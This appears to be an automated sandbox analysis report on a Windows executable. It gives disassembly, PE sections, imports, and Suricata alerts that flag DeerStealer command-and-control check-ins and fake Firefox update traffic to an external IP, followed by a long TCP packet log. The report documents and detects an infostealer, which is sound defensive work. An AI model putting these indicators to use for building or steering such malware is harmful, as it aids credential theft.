cmp dword ptr [00417710h], ebx
jne 00007F9124DDA0EEh
push 00411F78h
call dword ptr [00413194h]
pop ecx
call 00007F9124DDA1D4h
push 00417048h
push 00417044h
call 00007F9124DDA1BFh
mov eax, dword ptr [00417914h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00417910h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041319Ch]
push 00417040h
push 00417000h
call 00007F9124DDA18Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150dc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x10f2c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x310	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11317	0x11400	797279c5ab1a163aed1f2a528f9fe3ce	False	0.6174988677536232	data	6.576987441854239	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x30ea	0x3200	1359639b02bcb8f0a8743e6ead1c0030	False	0.43828125	data	5.549434098115495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x292c	0x800	9415c9c8dea3245d6d73c23393e27d8e	False	0.431640625	data	3.6583182363171756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x10f2c	0x11000	82df3bd29b0c4c5afa8fd54b0dad9402	False	0.21841969209558823	data	4.5319461046262575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Russian	Russia	0.2107831539098545
RT_GROUP_ICON	0x2a958	0x14	data	Russian	Russia	1.15
RT_VERSION	0x2a96c	0x350	data	English	United States	0.47523584905660377
RT_MANIFEST	0x2acbc	0x270	ASCII text, with very long lines (624), with no line terminators	English	United States	0.5144230769230769

Imports

DLL	Import
COMCTL32.dll
KERNEL32.dll	GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll	CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll	GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
SHELL32.dll	SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll	CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll	VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll	__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-14T19:56:53.472277+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49180	188.114.97.3	443	TCP
2024-11-14T19:56:54.027538+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.7	49180	188.114.97.3	443	TCP
2024-11-14T19:56:55.316793+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49191	188.114.97.3	443	TCP
2024-11-14T19:56:56.987750+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49202	188.114.97.3	443	TCP
2024-11-14T19:57:00.659841+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49218	188.114.97.3	443	TCP
2024-11-14T19:57:03.390674+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49234	188.114.97.3	443	TCP
2024-11-14T19:57:05.079525+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49241	188.114.97.3	443	TCP
2024-11-14T19:57:07.345394+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49251	188.114.97.3	443	TCP
2024-11-14T19:57:08.795187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49258	188.114.97.3	443	TCP
2024-11-14T19:57:10.927041+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49263	188.114.97.3	443	TCP
2024-11-14T19:57:12.682251+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49264	188.114.97.3	443	TCP
2024-11-14T19:57:44.181061+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49265	188.114.97.3	443	TCP
2024-11-14T19:57:45.085102+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.7	49265	188.114.97.3	443	TCP
2024-11-14T19:57:46.191474+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49266	188.114.97.3	443	TCP
2024-11-14T19:57:47.567376+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49267	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 19:56:52.451127052 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:52.451169968 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:52.451240063 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:52.452200890 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:52.452220917 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:53.472197056 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:53.472276926 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:53.475033045 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:53.475054979 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:53.475497007 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:53.526913881 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:53.546766996 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:53.546797037 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:53.547085047 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.027669907 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.027879953 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.027944088 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.027966022 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.028054953 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.028150082 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.028166056 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.028175116 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.028234005 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.028251886 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.028714895 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.028945923 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.028954983 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.073771954 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.073792934 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.120660067 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.145452976 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.152539968 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.152595997 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.152622938 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.152986050 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.153038979 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.153048992 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.153417110 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.153462887 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.153471947 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.153578997 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.153620005 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.153626919 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.198781967 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.198807955 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.245675087 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.263020992 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.270703077 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.270778894 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.270797968 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.270828962 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.270881891 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.270915985 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.271174908 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.271225929 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.271239996 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.271357059 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.271511078 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.271521091 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.312803984 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.312868118 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.312903881 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.355042934 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.381135941 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388102055 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388144970 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388144970 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.388170958 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388287067 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388308048 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.388319016 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388396978 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.388566971 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388626099 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.388947964 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.388956070 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.389045000 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.389091969 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.389097929 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.389163017 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.389206886 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.389375925 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.389393091 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.389405012 CET	49180	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.389410973 CET	443	49180	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.427753925 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.427813053 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:54.427936077 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.428442955 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:54.428462029 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:55.316577911 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:55.316792965 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:55.420105934 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:55.420149088 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:55.421125889 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:55.423034906 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:55.423213005 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:55.423226118 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.233901024 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.234438896 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.234652996 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.234652996 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.234652996 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.291671038 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.291723013 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.291783094 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.292073011 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.292083025 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.448808908 CET	49191	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.448843002 CET	443	49191	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.987659931 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.987750053 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.988970041 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.988981962 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.989306927 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:56.990194082 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.990233898 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:56.990236998 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:57.341881037 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:57.342036009 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:57.342159033 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:57.342186928 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:57.342199087 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:57.342206001 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:57.342226982 CET	49202	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:57.342230082 CET	443	49202	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:59.950839996 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:59.950897932 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:56:59.950958014 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:59.951308966 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:56:59.951324940 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.659548044 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.659841061 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.660903931 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.660918951 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.661282063 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.665066957 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.665288925 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.665329933 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.665431023 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.665481091 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.665657997 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.665719032 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.666883945 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.666918993 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:00.666985035 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:00.666996002 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:01.855866909 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:01.856030941 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:01.856108904 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:01.975008011 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:01.975049019 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:01.975069046 CET	49218	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:01.975083113 CET	443	49218	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:02.664189100 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:02.664231062 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:02.664300919 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:02.664613008 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:02.664624929 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.390536070 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.390674114 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:03.391891003 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:03.391900063 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.392220020 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.393069029 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:03.393079996 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:03.393088102 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.946984053 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.947067976 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:03.947124004 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:03.961894035 CET	49234	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:03.961908102 CET	443	49234	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:04.004565001 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:04.004615068 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:04.004671097 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:04.005198002 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:04.005213022 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.079440117 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.079524994 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:05.139669895 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:05.139734983 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.140832901 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.142687082 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:05.142735004 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:05.142754078 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.928406954 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.928574085 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:05.928642035 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:06.180495024 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:06.180535078 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:06.180546999 CET	49241	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:06.180555105 CET	443	49241	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:06.478009939 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:06.478050947 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:06.478111982 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:06.478379011 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:06.478393078 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.345288038 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.345393896 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.346535921 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.346544027 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.346750021 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.347582102 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.347595930 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.347601891 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.871812105 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.871877909 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.872025967 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.872025967 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.872056961 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.872081995 CET	49251	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.872088909 CET	443	49251	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.909244061 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.909282923 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:07.909351110 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.909607887 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:07.909622908 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:08.795089960 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:08.795186996 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:08.848341942 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:08.848377943 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:08.849265099 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:08.850097895 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:08.850300074 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:08.850343943 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:08.850492954 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:08.850545883 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:09.694271088 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:09.694350004 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:09.694416046 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:09.694567919 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:09.694591045 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:09.694606066 CET	49258	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:09.694612980 CET	443	49258	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:09.991045952 CET	49263	443	192.168.2.7	188.114.97.3
